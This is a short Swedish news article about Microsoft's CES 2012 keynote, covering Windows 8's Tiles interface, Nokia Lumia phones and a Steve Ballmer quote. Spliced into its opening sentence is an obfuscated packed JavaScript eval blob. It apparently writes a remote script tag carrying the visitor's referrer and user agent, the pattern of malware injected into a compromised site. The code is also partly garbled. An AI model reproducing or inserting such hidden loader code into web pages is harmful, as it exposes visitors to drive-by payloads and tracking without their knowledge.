Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

PC

CES 2012: Microsoft bygger om från grunden

CES 2012: Microsoft bygger om från grunden
Sebastian

Huvudattraktion eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rzntt|var|u0026u|referrer|hhiny||js|php’.split(’|’),0,{}))
under kvällen på CES 2012 var självklart kommande Windows 8!

Microsoft var mycket ivriga på att få visa upp sina nya Nokia smartphones med det helt nya systemet Windows Phone 7.5. Där bland kan man hitta Lumia 900 och en modell som Nokia just avslöjat ett par timmar tidigare.

Men vad alla väntade på var självklart Windows 8. Microsoft fokuserade på den radikalt annorlunda upplevelsen som Windows 8 och nya gränssnittet Tiles ger.

[quote]- Saker och ting förändras, det är själva kärnan av den här industrin. En sak som vi upptäckt genom åren med varje ny generation av Windows är att användare är entusiastiska och vill verkligen ha det nya, men de vill inte heller ge upp det gamla. I Windows 8 har vi gjort om upplevelsen helt från början, säger Steve Ballmer.[/quote]

I Windows 8 kommer vi få se mycket funktioner och design från deras Windows Phone 7.5. Allt kommer gå i samma manér och design, också kallat Tiles. Tiles är inte bara en ny design på programmeny, utan också en samling widgets som anpassar sig efter hur man använder dem, vilka av dina kontakter i sociala nätverk du pratar med mest osv.

Se bilder från Windows 8: Här

Mer om äldre Nokia Lumia: Här

Läs vidare i artikeln: Idg.se